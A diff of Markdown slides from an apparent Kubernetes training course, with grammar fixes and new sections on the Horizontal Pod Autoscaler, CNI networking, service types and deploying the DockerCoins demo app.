||||
|
||||
- Inspect the certificate:
|
||||
```bash
|
||||
openssl x509 -in cert.pem -text -noout
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Using the certificate
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the key and certificate to kubeconfig:
|
||||
```bash
|
||||
kubectl config set-credentials cert:jean.doe --embed-certs \
|
||||
--client-certificate=cert.pem --client-key=key.pem
|
||||
```
|
||||
|
||||
- Update the user's context to use the key and cert to authenticate:
|
||||
```bash
|
||||
kubectl config set-context jean.doe --user cert:jean.doe
|
||||
```
|
||||
|
||||
- Confirm that we are seen as `jean.doe` (but don't have permissions):
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's missing?
|
||||
|
||||
We have just shown, step by step, a method to issue short-lived certificates for users.
|
||||
|
||||
To be usable in real environments, we would need to add:
|
||||
|
||||
- a kubectl helper to automatically generate the CSR and obtain the cert
|
||||
|
||||
(and transparently renew the cert when needed)
|
||||
|
||||
- a Kubernetes controller to automatically validate and approve CSRs
|
||||
|
||||
(checking that the subject and groups are valid)
|
||||
|
||||
- a way for the users to know the groups to add to their CSR
|
||||
|
||||
(e.g.: annotations on their ServiceAccount + read access to the ServiceAccount)
|
||||
|
||||
---
|
||||
|
||||
## Is this realistic?
|
||||
|
||||
- Larger organizations typically integrate with their own directory
|
||||
|
||||
- The general principle, however, is the same:
|
||||
|
||||
- users have long-term credentials (password, token...)
|
||||
|
||||
- they use these credentials to obtain other, short-lived credentials
|
||||
|
||||
- This provides enhanced security:
|
||||
|
||||
- the long-term credentials can use long passphrases, 2FA, HSM...
|
||||
|
||||
- the short-term credentials are more convenient to use
|
||||
|
||||
- we get strong security *and* convenience
|
||||
|
||||
- Systems like Vault also have certificate issuance mechanisms
|
||||
@@ -73,18 +73,13 @@
|
||||
|
||||
- Dump the `rng` resource in YAML:
|
||||
```bash
|
||||
kubectl get deploy/rng -o yaml --export >rng.yml
|
||||
kubectl get deploy/rng -o yaml >rng.yml
|
||||
```
|
||||
|
||||
- Edit `rng.yml`
|
||||
|
||||
]
|
||||
|
||||
Note: `--export` will remove "cluster-specific" information, i.e.:
|
||||
- namespace (so that the resource is not tied to a specific namespace)
|
||||
- status and creation timestamp (useless when creating a new resource)
|
||||
- resourceVersion and uid (these would cause... *interesting* problems)
|
||||
|
||||
---
|
||||
|
||||
## "Casting" a resource to another
|
||||
@@ -376,7 +371,7 @@ But ... why do these pods (in particular, the *new* ones) have this `app=rng` la
|
||||
|
||||
- Bottom line: if we remove our `app=rng` label ...
|
||||
|
||||
... The pod "diseappears" for its parent, which re-creates another pod to replace it
|
||||
... The pod "disappears" for its parent, which re-creates another pod to replace it
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -153,5 +153,7 @@ The dashboard will then ask you which authentication you want to use.
|
||||
|
||||
--
|
||||
|
||||
- It introduces new failure modes (like if you try to apply yaml from a link that's no longer valid)
|
||||
- It introduces new failure modes
|
||||
|
||||
(for instance, if you try to apply YAML from a link that's no longer valid)
|
||||
|
||||
|
||||
@@ -1,6 +1,20 @@
|
||||
## Declarative vs imperative in Kubernetes
|
||||
|
||||
- Virtually everything we create in Kubernetes is created from a *spec*
|
||||
- With Kubernetes, we cannot say: "run this container"
|
||||
|
||||
- All we can do is write a *spec* and push it to the API server
|
||||
|
||||
(by creating a resource like e.g. a Pod or a Deployment)
|
||||
|
||||
- The API server will validate that spec (and reject it if it's invalid)
|
||||
|
||||
- Then it will store it in etcd
|
||||
|
||||
- A *controller* will "notice" that spec and act upon it
|
||||
|
||||
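For example, pushing this minimal spec is all we do; the Deployment controller then creates the ReplicaSet and Pods for us:

```bash
kubectl apply -f - <<EOF
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web
spec:
  replicas: 2
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
      - name: nginx
        image: nginx
EOF
```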
---
|
||||
|
||||
## Reconciling state
|
||||
|
||||
- Watch for the `spec` fields in the YAML files later!
|
||||
|
||||
|
||||
@@ -175,7 +175,7 @@ Success!
|
||||
|
||||
]
|
||||
|
||||
So far, so good.
|
||||
We should get `No resources found.` and the `kubernetes` service, respectively.
|
||||
|
||||
Note: the API server automatically created the `kubernetes` service entry.
|
||||
|
||||
@@ -225,7 +225,7 @@ Success?
|
||||
|
||||
]
|
||||
|
||||
Our Deployment is in a bad shape:
|
||||
Our Deployment is in bad shape:
|
||||
```
|
||||
NAME READY UP-TO-DATE AVAILABLE AGE
|
||||
deployment.apps/web 0/1 0 0 2m26s
|
||||
@@ -584,7 +584,7 @@ Our pod is still `Pending`. 🤔
|
||||
|
||||
Which is normal: it needs to be *scheduled*.
|
||||
|
||||
(i.e., something needs to decide on which node it should go.)
|
||||
(i.e., something needs to decide which node it should go on.)
|
||||
|
||||
---
|
||||
|
||||
@@ -658,7 +658,7 @@ class: extra-details
|
||||
|
||||
- This is actually how the scheduler works!
|
||||
|
||||
- It watches pods, takes scheduling decisions, creates Binding objects
|
||||
- It watches pods, makes scheduling decisions, and creates Binding objects
|
||||
|
||||
---
|
||||
|
||||
@@ -686,7 +686,7 @@ We should see the `Welcome to nginx!` page.
|
||||
|
||||
## Exposing our Deployment
|
||||
|
||||
- We can now create a Service associated to this Deployment
|
||||
- We can now create a Service associated with this Deployment
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -711,11 +711,11 @@ This won't work. We need kube-proxy to enable internal communication.
|
||||
|
||||
## Starting kube-proxy
|
||||
|
||||
- kube-proxy also needs to connect to API server
|
||||
- kube-proxy also needs to connect to the API server
|
||||
|
||||
- It can work with the `--master` flag
|
||||
|
||||
(even though that will be deprecated in the future)
|
||||
(although that will be deprecated in the future)
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -832,6 +832,6 @@ class: extra-details
|
||||
|
||||
- By default, the API server expects to be running directly on the nodes
|
||||
|
||||
(it could be as a bare process, or in a container/pod using host network)
|
||||
(it could be as a bare process, or in a container/pod using the host network)
|
||||
|
||||
- ... And it expects to be listening on port 6443 with TLS
|
||||
|
||||
@@ -61,7 +61,7 @@ There are many possibilities!
|
||||
|
||||
- creates a new custom type, `Remote`, exposing a git+ssh server
|
||||
|
||||
- deploy by pushing YAML or Helm Charts to that remote
|
||||
- deploy by pushing YAML or Helm charts to that remote
|
||||
|
||||
- Replacing built-in types with CRDs
|
||||
|
||||
@@ -117,7 +117,7 @@ Examples:
|
||||
|
||||
## Admission controllers
|
||||
|
||||
- When a Pod is created, it is associated to a ServiceAccount
|
||||
- When a Pod is created, it is associated with a ServiceAccount
|
||||
|
||||
(even if we did not specify one explicitly)
|
||||
|
||||
@@ -163,7 +163,7 @@ class: pic
|
||||
|
||||
- These webhooks can be *validating* or *mutating*
|
||||
|
||||
- Webhooks can be setup dynamically (without restarting the API server)
|
||||
- Webhooks can be set up dynamically (without restarting the API server)
|
||||
|
||||
- To setup a dynamic admission webhook, we create a special resource:
|
||||
|
||||
@@ -171,7 +171,7 @@ class: pic
|
||||
|
||||
- These resources are created and managed like other resources
|
||||
|
||||
(i.e. `kubectl create`, `kubectl get` ...)
|
||||
(i.e. `kubectl create`, `kubectl get`...)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -234,6 +234,6 @@
|
||||
|
||||
(see the [documentation](https://github.com/hasura/gitkube/blob/master/docs/remote.md) for more details)
|
||||
|
||||
- Gitkube can also deploy Helm Charts
|
||||
- Gitkube can also deploy Helm charts
|
||||
|
||||
(instead of raw YAML files)
|
||||
|
||||
@@ -108,7 +108,7 @@
|
||||
|
||||
(as opposed to merely started)
|
||||
|
||||
- Containers in a broken state gets killed and restarted
|
||||
- Containers in a broken state get killed and restarted
|
||||
|
||||
(instead of serving errors or timeouts)
|
||||
|
||||
|
||||
@@ -158,7 +158,7 @@ Where do these `--set` options come from?
|
||||
|
||||
]
|
||||
|
||||
The chart's metadata includes an URL to the project's home page.
|
||||
The chart's metadata includes a URL to the project's home page.
|
||||
|
||||
(Sometimes it conveniently points to the documentation for the chart.)
|
||||
|
||||
|
||||
245
slides/k8s/horizontal-pod-autoscaler.md
Normal file
245
slides/k8s/horizontal-pod-autoscaler.md
Normal file
@@ -0,0 +1,245 @@
|
||||
# The Horizontal Pod Autoscaler
|
||||
|
||||
- What is the Horizontal Pod Autoscaler, or HPA?
|
||||
|
||||
- It is a controller that can perform *horizontal* scaling automatically
|
||||
|
||||
- Horizontal scaling = changing the number of replicas
|
||||
|
||||
(adding/removing pods)
|
||||
|
||||
- Vertical scaling = changing the size of individual replicas
|
||||
|
||||
(increasing/reducing CPU and RAM per pod)
|
||||
|
||||
- Cluster scaling = changing the size of the cluster
|
||||
|
||||
(adding/removing nodes)
|
||||
|
||||
---
|
||||
|
||||
## Principle of operation
|
||||
|
||||
- Each HPA resource (or "policy") specifies:
|
||||
|
||||
- which object to monitor and scale (e.g. a Deployment, ReplicaSet...)
|
||||
|
||||
- min/max scaling ranges (the max is a safety limit!)
|
||||
|
||||
- a target resource usage (e.g. the default is CPU=80%)
|
||||
|
||||
- The HPA continuously monitors the CPU usage for the related object
|
||||
|
||||
- It computes how many pods should be running:
|
||||
|
||||
`TargetNumOfPods = ceil(sum(CurrentPodsCPUUtilization) / Target)`
|
||||
|
||||
- It scales the related object up/down to this target number of pods
|
||||
|
||||
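A quick worked example (hypothetical numbers): with three pods each using 90% of their requested CPU, and a target of 80%:

```
TargetNumOfPods = ceil((90 + 90 + 90) / 80) = ceil(3.375) = 4
```

...so the HPA scales the related object to 4 replicas.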
---
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- The metrics server needs to be running
|
||||
|
||||
(i.e. we need to be able to see pod metrics with `kubectl top pods`)
|
||||
|
||||
- The pods that we want to autoscale need to have resource requests
|
||||
|
||||
(because the target CPU% is not absolute, but relative to the request)
|
||||
|
||||
- The latter actually makes a lot of sense:
|
||||
|
||||
- if a Pod doesn't have a CPU request, it might be using 10% of CPU...
|
||||
|
||||
- ...but only because there is no CPU time available!
|
||||
|
||||
- this makes sure that we won't add pods to nodes that are already resource-starved
|
||||
|
||||
---
|
||||
|
||||
## Testing the HPA
|
||||
|
||||
- We will start a CPU-intensive web service
|
||||
|
||||
- We will send some traffic to that service
|
||||
|
||||
- We will create an HPA policy
|
||||
|
||||
- The HPA will automatically scale up the service for us
|
||||
|
||||
---
|
||||
|
||||
## A CPU-intensive web service
|
||||
|
||||
- Let's use `jpetazzo/busyhttp`
|
||||
|
||||
(it is a web server that will use 1s of CPU for each HTTP request)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Deploy the web server:
|
||||
```bash
|
||||
kubectl create deployment busyhttp --image=jpetazzo/busyhttp
|
||||
```
|
||||
|
||||
- Expose it with a ClusterIP service:
|
||||
```bash
|
||||
kubectl expose deployment busyhttp --port=80
|
||||
```
|
||||
|
||||
- Get the ClusterIP allocated to the service:
|
||||
```bash
|
||||
kubectl get svc busyhttp
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Monitor what's going on
|
||||
|
||||
- Let's start a bunch of commands to watch what is happening
|
||||
|
||||
.exercise[
|
||||
|
||||
- Monitor pod CPU usage:
|
||||
```bash
|
||||
watch kubectl top pods
|
||||
```
|
||||
|
||||
- Monitor service latency:
|
||||
```bash
|
||||
httping http://`ClusterIP`/
|
||||
```
|
||||
|
||||
- Monitor cluster events:
|
||||
```bash
|
||||
kubectl get events -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Send traffic to the service
|
||||
|
||||
- We will use `ab` (Apache Bench) to send traffic
|
||||
|
||||
.exercise[
|
||||
|
||||
- Send a lot of requests to the service, with a concurrency level of 3:
|
||||
```bash
|
||||
ab -c 3 -n 100000 http://`ClusterIP`/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The latency (reported by `httping`) should increase above 3s.
|
||||
|
||||
The CPU utilization should increase to 100%.
|
||||
|
||||
(The server is single-threaded and won't go above 100%.)
|
||||
|
||||
---
|
||||
|
||||
## Create an HPA policy
|
||||
|
||||
- There is a helper command to do that for us: `kubectl autoscale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the HPA policy for the `busyhttp` deployment:
|
||||
```bash
|
||||
kubectl autoscale deployment busyhttp --max=10
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
By default, it will assume a target of 80% CPU usage.
|
||||
|
||||
This can also be set with `--cpu-percent=`.
|
||||
|
||||
--
|
||||
|
||||
*The autoscaler doesn't seem to work. Why?*
|
||||
|
||||
---
|
||||
|
||||
## What did we miss?
|
||||
|
||||
- The events stream gives us a hint, but to be honest, it's not very clear:
|
||||
|
||||
`missing request for cpu`
|
||||
|
||||
- We forgot to specify a resource request for our Deployment!
|
||||
|
||||
- The HPA target is not an absolute CPU%
|
||||
|
||||
- It is relative to the CPU requested by the pod
|
||||
|
||||
---
|
||||
|
||||
## Adding a CPU request
|
||||
|
||||
- Let's edit the deployment and add a CPU request
|
||||
|
||||
- Since our server can use up to 1 core, let's request 1 core
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the Deployment definition:
|
||||
```bash
|
||||
kubectl edit deployment busyhttp
|
||||
```
|
||||
|
||||
- In the `containers` list, add the following block:
|
||||
```yaml
|
||||
resources:
|
||||
requests:
|
||||
cpu: "1"
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Results
|
||||
|
||||
- After saving and quitting, a rolling update happens
|
||||
|
||||
(if `ab` or `httping` exits, make sure to restart it)
|
||||
|
||||
- It will take a minute or two for the HPA to kick in:
|
||||
|
||||
- the HPA runs every 30 seconds by default
|
||||
|
||||
- it needs to gather metrics from the metrics server first
|
||||
|
||||
- If we scale further up (or down), the HPA will react after a few minutes:
|
||||
|
||||
- it won't scale up if it already scaled in the last 3 minutes
|
||||
|
||||
- it won't scale down if it already scaled in the last 5 minutes
|
||||
|
||||
---
|
||||
|
||||
## What about other metrics?
|
||||
|
||||
- The HPA in API group `autoscaling/v1` only supports CPU scaling
|
||||
|
||||
- The HPA in API group `autoscaling/v2beta2` supports metrics from various API groups:
|
||||
|
||||
- metrics.k8s.io, aka metrics server (per-Pod CPU and RAM)
|
||||
|
||||
- custom.metrics.k8s.io, custom metrics per Pod
|
||||
|
||||
- external.metrics.k8s.io, external metrics (not associated with Pods)
|
||||
|
||||
- Kubernetes doesn't implement any of these API groups
|
||||
|
||||
- Using these metrics requires [registering additional APIs](https://kubernetes.io/docs/tasks/run-application/horizontal-pod-autoscale/#support-for-metrics-apis)
|
||||
|
||||
- The metrics provided by metrics server are standard; everything else is custom
|
||||
|
||||
- For more details, see [this great blog post](https://medium.com/uptime-99/kubernetes-hpa-autoscaling-with-custom-and-external-metrics-da7f41ff7846) or [this talk](https://www.youtube.com/watch?v=gSiGFH4ZnS8)
|
||||
@@ -88,7 +88,7 @@
|
||||
|
||||
- the control loop watches over ingress resources, and configures the LB accordingly
|
||||
|
||||
- Step 2: setup DNS
|
||||
- Step 2: set up DNS
|
||||
|
||||
- associate DNS entries with the load balancer address
|
||||
|
||||
@@ -126,7 +126,7 @@
|
||||
|
||||
- We could use pods specifying `hostPort: 80`
|
||||
|
||||
... but with most CNI plugins, this [doesn't work or require additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
|
||||
... but with most CNI plugins, this [doesn't work or requires additional setup](https://github.com/kubernetes/kubernetes/issues/23920)
|
||||
|
||||
- We could use a `NodePort` service
|
||||
|
||||
@@ -142,7 +142,7 @@
|
||||
|
||||
(sometimes called sandbox or network sandbox)
|
||||
|
||||
- An IP address is associated to the pod
|
||||
- An IP address is assigned to the pod
|
||||
|
||||
- This IP address is routed/connected to the cluster network
|
||||
|
||||
@@ -239,7 +239,7 @@ class: extra-details
|
||||
|
||||
- an error condition on the node
|
||||
<br/>
|
||||
(for instance: "disk full", do not start new pods here!)
|
||||
(for instance: "disk full," do not start new pods here!)
|
||||
|
||||
- The `effect` can be:
|
||||
|
||||
@@ -501,11 +501,11 @@ spec:
|
||||
|
||||
(as long as it has access to the cluster subnet)
|
||||
|
||||
- This allows to use external (hardware, physical machines...) load balancers
|
||||
- This allows the use of external (hardware, physical machines...) load balancers
|
||||
|
||||
- Annotations can encode special features
|
||||
|
||||
(rate-limiting, A/B testing, session stickiness, etc.)
|
||||
(rate-limiting, A/B testing, session stickiness, etc.)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -81,7 +81,7 @@ Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables`
|
||||
|
||||
.exercise[
|
||||
|
||||
- In another window, watch the pods (to see when they will be created):
|
||||
- In another window, watch the pods (to see when they are created):
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
```
|
||||
@@ -276,3 +276,21 @@ error: the server doesn't have a resource type "endpoint"
|
||||
- There is no `endpoint` object: `type Endpoints struct`
|
||||
|
||||
- The type doesn't represent a single endpoint, but a list of endpoints
|
||||
|
||||
---
|
||||
|
||||
## Exposing services to the outside world
|
||||
|
||||
- The default type (ClusterIP) only works for internal traffic
|
||||
|
||||
- If we want to accept external traffic, we can use one of these:
|
||||
|
||||
- NodePort (expose a service on a TCP port in the 30000-32767 range)
|
||||
|
||||
- LoadBalancer (provision a cloud load balancer for our service)
|
||||
|
||||
- ExternalIP (use one node's external IP address)
|
||||
|
||||
- Ingress (a special mechanism for HTTP services)
|
||||
|
||||
*We'll see NodePorts and Ingresses in more detail later.*
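- As a quick preview, a minimal NodePort Service could be sketched like this (the name, selector, and port numbers are assumptions):
  ```yaml
  apiVersion: v1
  kind: Service
  metadata:
    name: webui
  spec:
    type: NodePort
    selector:
      app: webui
    ports:
    - port: 80        # ClusterIP port
      targetPort: 80  # container port
      nodePort: 30080 # optional; must be in the 30000-32767 range by default
  ```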
|
||||
|
||||
@@ -79,6 +79,8 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Exploring types and definitions
|
||||
|
||||
- We can list all available resource types by running `kubectl api-resources`
|
||||
@@ -102,9 +104,11 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Introspection vs. documentation
|
||||
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.14/)
|
||||
- We can access the same information by reading the [API documentation](https://kubernetes.io/docs/reference/#api-reference)
|
||||
|
||||
- The API documentation is usually easier to read, but:
|
||||
|
||||
@@ -128,7 +132,7 @@
|
||||
|
||||
- short (e.g. `no`, `svc`, `deploy`)
|
||||
|
||||
- Some resources do not have a short names
|
||||
- Some resources do not have a short name
|
||||
|
||||
- `Endpoints` only have a plural form
|
||||
|
||||
@@ -462,4 +466,4 @@ class: extra-details
|
||||
- For more details, see [KEP-0009] or the [node controller documentation]
|
||||
|
||||
[KEP-0009]: https://github.com/kubernetes/enhancements/blob/master/keps/sig-node/0009-node-heartbeat.md
|
||||
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
|
||||
[node controller documentation]: https://kubernetes.io/docs/concepts/architecture/nodes/#node-controller
|
||||
|
||||
@@ -77,9 +77,9 @@ If we wanted to talk to the API, we would need to:
|
||||
|
||||
- This is a great tool to learn and experiment with the Kubernetes API
|
||||
|
||||
- ... And for serious usages as well (suitable for one-shot scripts)
|
||||
- ... And for serious uses as well (suitable for one-shot scripts)
|
||||
|
||||
- For unattended use, it is better to create a [service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
- For unattended use, it's better to create a [service account](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/)
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -320,6 +320,8 @@ We could! But the *deployment* would notice it right away, and scale back to the
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
### Streaming logs of many pods
|
||||
|
||||
- Let's see what happens if we try to stream the logs for more than 5 pods
|
||||
@@ -347,6 +349,8 @@ use --max-log-requests to increase the limit
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Why can't we stream the logs of many pods?
|
||||
|
||||
- `kubectl` opens one connection to the API server per pod
|
||||
|
||||
@@ -16,6 +16,8 @@
|
||||
|
||||
- each pod is aware of its IP address (no NAT)
|
||||
|
||||
- pod IP addresses are assigned by the network implementation
|
||||
|
||||
- Kubernetes doesn't mandate any particular implementation
|
||||
|
||||
---
|
||||
@@ -30,7 +32,7 @@
|
||||
|
||||
- No new protocol
|
||||
|
||||
- Pods cannot move from a node to another and keep their IP address
|
||||
- The network implementation can decide how to allocate addresses
|
||||
|
||||
- IP addresses don't have to be "portable" from a node to another
|
||||
|
||||
@@ -52,7 +54,7 @@
|
||||
|
||||
(15 are listed in the Kubernetes documentation)
|
||||
|
||||
- Pods have level 3 (IP) connectivity, but *services* are level 4
|
||||
- Pods have level 3 (IP) connectivity, but *services* are level 4 (TCP or UDP)
|
||||
|
||||
(Services map to a single UDP or TCP port; no port ranges or arbitrary IP packets)
|
||||
|
||||
@@ -82,13 +84,17 @@
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## The Container Network Interface (CNI)
|
||||
|
||||
- The CNI has a well-defined [specification](https://github.com/containernetworking/cni/blob/master/SPEC.md#network-configuration) for network plugins
|
||||
- Most Kubernetes clusters use CNI "plugins" to implement networking
|
||||
|
||||
- When a pod is created, Kubernetes delegates the network setup to CNI plugins
|
||||
- When a pod is created, Kubernetes delegates the network setup to these plugins
|
||||
|
||||
- Typically, a CNI plugin will:
|
||||
(it can be a single plugin, or a combination of plugins, each doing one task)
|
||||
|
||||
- Typically, CNI plugins will:
|
||||
|
||||
- allocate an IP address (by calling an IPAM plugin)
|
||||
|
||||
@@ -96,8 +102,46 @@
|
||||
|
||||
- configure the interface as well as required routes etc.
|
||||
|
||||
- Using multiple plugins can be done with "meta-plugins" like CNI-Genie or Multus
|
||||
---
|
||||
|
||||
- Not all CNI plugins are equal
|
||||
class: extra-details
|
||||
|
||||
(e.g. they don't all implement network policies, which are required to isolate pods)
|
||||
## Multiple moving parts
|
||||
|
||||
- The "pod-to-pod network" or "pod network":
|
||||
|
||||
- provides communication between pods and nodes
|
||||
|
||||
- is generally implemented with CNI plugins
|
||||
|
||||
- The "pod-to-service network":
|
||||
|
||||
- provides internal communication and load balancing
|
||||
|
||||
- is generally implemented with kube-proxy (or e.g. kube-router)
|
||||
|
||||
- Network policies:
|
||||
|
||||
- provide firewalling and isolation
|
||||
|
||||
- can be bundled with the "pod network" or provided by another component
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Even more moving parts
|
||||
|
||||
- Inbound traffic can be handled by multiple components:
|
||||
|
||||
- something like kube-proxy or kube-router (for NodePort services)
|
||||
|
||||
- load balancers (ideally, connected to the pod network)
|
||||
|
||||
- It is possible to use multiple pod networks in parallel
|
||||
|
||||
(with "meta-plugins" like CNI-Genie or Multus)
|
||||
|
||||
- Some solutions can fill multiple roles
|
||||
|
||||
(e.g. kube-router can be set up to provide the pod network and/or network policies and/or replace kube-proxy)
|
||||
|
||||
244
slides/k8s/kubercoins.md
Normal file
@@ -0,0 +1,244 @@
|
||||
# Deploying a sample application
|
||||
|
||||
- We will connect to our new Kubernetes cluster
|
||||
|
||||
- We will deploy a sample application, "DockerCoins"
|
||||
|
||||
- That app features multiple micro-services and a web UI
|
||||
|
||||
---
|
||||
|
||||
## Connecting to our Kubernetes cluster
|
||||
|
||||
- Our cluster has multiple nodes named `node1`, `node2`, etc.
|
||||
|
||||
- We will do everything from `node1`
|
||||
|
||||
- We have SSH access to the other nodes, but won't need it
|
||||
|
||||
(but we can use it for debugging, troubleshooting, etc.)
|
||||
|
||||
.exercise[
|
||||
|
||||
- Log into `node1`
|
||||
|
||||
- Check that all nodes are `Ready`:
|
||||
```bash
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Cloning some repos
|
||||
|
||||
- We will need two repositories:
|
||||
|
||||
- the first one has the "DockerCoins" demo app
|
||||
|
||||
- the second one has these slides, some scripts, more manifests ...
|
||||
|
||||
.exercise[
|
||||
|
||||
- Clone the kubercoins repository on `node1`:
|
||||
```bash
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
|
||||
- Clone the container.training repository as well:
|
||||
```bash
|
||||
git clone https://@@GITREPO@@
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Running the application
|
||||
|
||||
Without further ado, let's start this application!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply all the manifests from the kubercoins repository:
|
||||
```bash
|
||||
kubectl apply -f kubercoins/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's this application?
|
||||
|
||||
--
|
||||
|
||||
- It is a DockerCoin miner! .emoji[💰🐳📦🚢]
|
||||
|
||||
--
|
||||
|
||||
- No, you can't buy coffee with DockerCoins
|
||||
|
||||
--
|
||||
|
||||
- How DockerCoins works:
|
||||
|
||||
- generate a few random bytes
|
||||
|
||||
- hash these bytes
|
||||
|
||||
- increment a counter (to keep track of speed)
|
||||
|
||||
- repeat forever!
|
||||
|
||||
--
|
||||
|
||||
- DockerCoins is *not* a cryptocurrency
|
||||
|
||||
(the only common points are "randomness", "hashing", and "coins" in the name)
|
||||
|
||||
---
|
||||
|
||||
## DockerCoins in the microservices era
|
||||
|
||||
- DockerCoins is made of 5 services:
|
||||
|
||||
- `rng` = web service generating random bytes
|
||||
|
||||
- `hasher` = web service computing hash of POSTed data
|
||||
|
||||
- `worker` = background process calling `rng` and `hasher`
|
||||
|
||||
- `webui` = web interface to watch progress
|
||||
|
||||
- `redis` = data store (holds a counter updated by `worker`)
|
||||
|
||||
- These 5 services are visible in the application's Compose file,
|
||||
[docker-compose.yml](
|
||||
https://@@GITREPO@@/blob/master/dockercoins/docker-compose.yml)
|
||||
|
||||
---
|
||||
|
||||
## How DockerCoins works
|
||||
|
||||
- `worker` invokes web service `rng` to generate random bytes
|
||||
|
||||
- `worker` invokes web service `hasher` to hash these bytes
|
||||
|
||||
- `worker` does this in an infinite loop
|
||||
|
||||
- every second, `worker` updates `redis` to indicate how many loops were done
|
||||
|
||||
- `webui` queries `redis`, and computes and exposes "hashing speed" in our browser
|
||||
|
||||
*(See diagram on next slide!)*
|
||||
|
||||
---
|
||||
|
||||
class: pic
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## Service discovery in container-land
|
||||
|
||||
How does each service find out the address of the other ones?
|
||||
|
||||
--
|
||||
|
||||
- We do not hard-code IP addresses in the code
|
||||
|
||||
- We do not hard-code FQDNs in the code, either
|
||||
|
||||
- We just connect to a service name, and container-magic does the rest
|
||||
|
||||
(And by container-magic, we mean "a crafty, dynamic, embedded DNS server")
|
||||
|
||||
---
|
||||
|
||||
## Example in `worker/worker.py`
|
||||
|
||||
```python
|
||||
redis = Redis("`redis`")
|
||||
|
||||
|
||||
def get_random_bytes():
|
||||
r = requests.get("http://`rng`/32")
|
||||
return r.content
|
||||
|
||||
|
||||
def hash_bytes(data):
|
||||
r = requests.post("http://`hasher`/",
|
||||
data=data,
|
||||
headers={"Content-Type": "application/octet-stream"})
|
||||
```
|
||||
|
||||
(Full source code available [here](
|
||||
https://@@GITREPO@@/blob/8279a3bce9398f7c1a53bdd95187c53eda4e6435/dockercoins/worker/worker.py#L17
|
||||
))
|
||||
|
||||
---
|
||||
|
||||
## Show me the code!
|
||||
|
||||
- You can check the GitHub repository with all the materials of this workshop:
|
||||
<br/>https://@@GITREPO@@
|
||||
|
||||
- The application is in the [dockercoins](
|
||||
https://@@GITREPO@@/tree/master/dockercoins)
|
||||
subdirectory
|
||||
|
||||
- The Compose file ([docker-compose.yml](
|
||||
https://@@GITREPO@@/blob/master/dockercoins/docker-compose.yml))
|
||||
lists all 5 services
|
||||
|
||||
- `redis` is using an official image from the Docker Hub
|
||||
|
||||
- `hasher`, `rng`, `worker`, `webui` are each built from a Dockerfile
|
||||
|
||||
- Each service's Dockerfile and source code is in its own directory
|
||||
|
||||
(`hasher` is in the [hasher](https://@@GITREPO@@/blob/master/dockercoins/hasher/) directory,
|
||||
`rng` is in the [rng](https://@@GITREPO@@/blob/master/dockercoins/rng/)
|
||||
directory, etc.)
|
||||
|
||||
---
|
||||
|
||||
## Our application at work
|
||||
|
||||
- We can check the logs of our application's pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the logs of the various components:
|
||||
```bash
|
||||
kubectl logs deploy/worker
|
||||
kubectl logs deploy/hasher
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Connecting to the web UI
|
||||
|
||||
- "Logs are exciting and fun!" (No-one, ever)
|
||||
|
||||
- The `webui` container exposes a web dashboard; let's view it
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the NodePort allocated to the web UI:
|
||||
```bash
|
||||
kubectl get svc webui
|
||||
```
|
||||
|
||||
- Open that in a web browser
|
||||
|
||||
]
|
||||
|
||||
A drawing area should show up, and after a few seconds, a blue
|
||||
graph will appear.
|
||||
@@ -14,15 +14,15 @@
|
||||
|
||||
## Differences with Helm
|
||||
|
||||
- Helm Charts use placeholders `{{ like.this }}`
|
||||
- Helm charts use placeholders `{{ like.this }}`
|
||||
|
||||
- Kustomize "bases" are standard Kubernetes YAML
|
||||
|
||||
- It is possible to use an existing set of YAML as a Kustomize base
|
||||
|
||||
- As a result, writing a Helm Chart is more work ...
|
||||
- As a result, writing a Helm chart is more work ...
|
||||
|
||||
- ... But Helm Charts are also more powerful; e.g. they can:
|
||||
